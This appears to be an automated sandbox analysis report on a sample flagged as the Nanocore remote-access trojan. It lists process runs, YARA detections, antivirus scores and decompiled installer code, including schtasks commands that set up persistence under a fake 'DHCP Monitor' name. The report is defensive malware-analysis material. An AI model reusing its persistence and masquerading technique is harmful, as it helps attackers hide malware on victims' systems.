              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, Author: Joe Security
              Reputation:low

              General

              Start time:17:21:16
              Start date:08/04/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp'
              Imagebase:0xb50000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:17:21:16
              Start date:08/04/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7ecfc0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:17:21:17
              Start date:08/04/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp'
              Imagebase:0x7ff797770000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:17:21:17
              Start date:08/04/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7ecfc0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:17:21:17
              Start date:08/04/2021
              Path:C:\Users\user\Desktop\bGf2H3tXGg.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\bGf2H3tXGg.exe 0
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              General

              Start time:17:21:20
              Start date:08/04/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 51%, Virustotal
              • Detection: 16%, Metadefender
              • Detection: 69%, ReversingLabs
              Reputation:low

              General

              Start time:17:21:28
              Start date:08/04/2021
              Path:C:\Users\user\Desktop\bGf2H3tXGg.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\bGf2H3tXGg.exe 0
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.318765961.0000000002530000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              General

              Start time:17:21:29
              Start date:08/04/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              General

              Start time:17:21:31
              Start date:08/04/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.323888903.00000000025B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              General

              Start time:17:21:42
              Start date:08/04/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.339271124.00000000024E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.339201684.0000000002491000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Disassembly

              Code Analysis

                Executed Functions

                C-Code - Quality: 86%
                			_entry_() {
                				signed int _t42;
                				intOrPtr* _t47;
                				CHAR* _t51;
                				char* _t53;
                				CHAR* _t55;
                				void* _t59;
                				intOrPtr _t61;
                				int _t63;
                				int _t66;
                				signed int _t67;
                				int _t68;
                				signed int _t70;
                				void* _t94;
                				signed int _t110;
                				void* _t113;
                				void* _t118;
                				intOrPtr* _t119;
                				char _t122;
                				signed int _t141;
                				signed int _t142;
                				int _t150;
                				void* _t151;
                				intOrPtr* _t153;
                				CHAR* _t156;
                				CHAR* _t157;
                				void* _t159;
                				char* _t160;
                				void* _t163;
                				void* _t164;
                				char _t189;
                
                				 *(_t164 + 0x18) = 0;
                				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                				 *(_t164 + 0x20) = 0;
                				 *(_t164 + 0x14) = 0x20;
                				SetErrorMode(0x8001); // executed
                				_t42 = GetVersion() & 0xbfffffff;
                				 *0x42f42c = _t42;
                				if(_t42 != 6) {
                					_t119 = E00406500(0);
                					if(_t119 != 0) {
                						 *_t119(0xc00);
                					}
                				}
                				_t156 = "UXTHEME";
                				do {
                					E00406492(_t156); // executed
                					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                				} while ( *_t156 != 0);
                				E00406500(0xb);
                				 *0x42f424 = E00406500(9);
                				_t47 = E00406500(7);
                				if(_t47 != 0) {
                					_t47 =  *_t47(0x1e);
                					if(_t47 != 0) {
                						 *0x42f42f =  *0x42f42f | 0x00000040;
                					}
                				}
                				__imp__#17(_t159);
                				__imp__OleInitialize(0); // executed
                				 *0x42f4f8 = _t47;
                				SHGetFileInfoA(0x429850, 0, _t164 + 0x38, 0x160, 0); // executed
                				E004060F7("Template Method Pattern Setup", "NSIS Error");
                				_t51 = GetCommandLineA();
                				_t160 = "\"C:\\Users\\alfons\\Desktop\\bGf2H3tXGg.exe\" ";
                				E004060F7(_t160, _t51);
                				 *0x42f420 = 0x400000;
                				_t53 = _t160;
                				if("\"C:\\Users\\alfons\\Desktop\\bGf2H3tXGg.exe\" " == 0x22) {
                					 *(_t164 + 0x14) = 0x22;
                					_t53 =  &M00435001;
                				}
                				_t55 = CharNextA(E00405ABA(_t53,  *(_t164 + 0x14)));
                				 *(_t164 + 0x1c) = _t55;
                				while(1) {
                					_t122 =  *_t55;
                					_t172 = _t122;
                					if(_t122 == 0) {
                						break;
                					}
                					__eflags = _t122 - 0x20;
                					if(_t122 != 0x20) {
                						L13:
                						__eflags =  *_t55 - 0x22;
                						 *(_t164 + 0x14) = 0x20;
                						if( *_t55 == 0x22) {
                							_t55 =  &(_t55[1]);
                							__eflags = _t55;
                							 *(_t164 + 0x14) = 0x22;
                						}
                						__eflags =  *_t55 - 0x2f;
                						if( *_t55 != 0x2f) {
                							L25:
                							_t55 = E00405ABA(_t55,  *(_t164 + 0x14));
                							__eflags =  *_t55 - 0x22;
                							if(__eflags == 0) {
                								_t55 =  &(_t55[1]);
                								__eflags = _t55;
                							}
                							continue;
                						} else {
                							_t55 =  &(_t55[1]);
                							__eflags =  *_t55 - 0x53;
                							if( *_t55 != 0x53) {
                								L20:
                								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                									L24:
                									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                										 *((char*)(_t55 - 2)) = 0;
                										__eflags =  &(_t55[2]);
                										E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp",  &(_t55[2]));
                										L30:
                										_t157 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                										GetTempPathA(0x400, _t157);
                										_t59 = E00403317(_t172);
                										_t173 = _t59;
                										if(_t59 != 0) {
                											L33:
                											DeleteFileA("1033"); // executed
                											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
                											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                											if(_t61 != 0) {
                												L43:
                												E00403830();
                												__imp__OleUninitialize();
                												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                													__eflags =  *0x42f4d4;
                													if( *0x42f4d4 == 0) {
                														L67:
                														_t63 =  *0x42f4ec;
                														__eflags = _t63 - 0xffffffff;
                														if(_t63 != 0xffffffff) {
                															 *(_t164 + 0x14) = _t63;
                														}
                														ExitProcess( *(_t164 + 0x14));
                													}
                													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                													__eflags = _t66;
                													_t150 = 2;
                													if(_t66 != 0) {
                														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                														 *(_t164 + 0x38) = 1;
                														 *(_t164 + 0x44) = _t150;
                														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                													}
                													_t67 = E00406500(4);
                													__eflags = _t67;
                													if(_t67 == 0) {
                														L65:
                														_t68 = ExitWindowsEx(_t150, 0x80040002);
                														__eflags = _t68;
                														if(_t68 != 0) {
                															goto L67;
                														}
                														goto L66;
                													} else {
                														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                														__eflags = _t70;
                														if(_t70 == 0) {
                															L66:
                															E0040140B(9);
                															goto L67;
                														}
                														goto L65;
                													}
                												}
                												E00405813( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                												ExitProcess(2);
                											}
                											if( *0x42f440 == 0) {
                												L42:
                												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
                												 *(_t164 + 0x18) = E0040390A( *0x42f4ec);
                												goto L43;
                											}
                											_t153 = E00405ABA(_t160, 0);
                											if(_t153 < _t160) {
                												L39:
                												_t182 = _t153 - _t160;
                												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                												if(_t153 < _t160) {
                													_t151 = E0040577E(_t185);
                													lstrcatA(_t157, "~nsu");
                													if(_t151 != 0) {
                														lstrcatA(_t157, "A");
                													}
                													lstrcatA(_t157, ".tmp");
                													_t162 = "C:\\Users\\alfons\\Desktop";
                													if(lstrcmpiA(_t157, "C:\\Users\\alfons\\Desktop") != 0) {
                														_push(_t157);
                														if(_t151 == 0) {
                															E00405761();
                														} else {
                															E004056E4();
                														}
                														SetCurrentDirectoryA(_t157);
                														_t189 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
                														if(_t189 == 0) {
                															E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t162);
                														}
                														E004060F7(0x430000,  *(_t164 + 0x1c));
                														_t137 = "A";
                														_t163 = 0x1a;
                														 *0x430400 = "A";
                														do {
                															E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
                															DeleteFileA(0x429450);
                															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\bGf2H3tXGg.exe", 0x429450, 1) != 0) {
                																E00405ED6(_t137, 0x429450, 0);
                																E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
                																_t94 = E00405796(0x429450);
                																if(_t94 != 0) {
                																	CloseHandle(_t94);
                																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                																}
                															}
                															 *0x430400 =  *0x430400 + 1;
                															_t163 = _t163 - 1;
                														} while (_t163 != 0);
                														E00405ED6(_t137, _t157, 0);
                													}
                													goto L43;
                												}
                												 *_t153 = 0;
                												_t154 = _t153 + 4;
                												if(E00405B7D(_t182, _t153 + 4) == 0) {
                													goto L43;
                												}
                												E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t154);
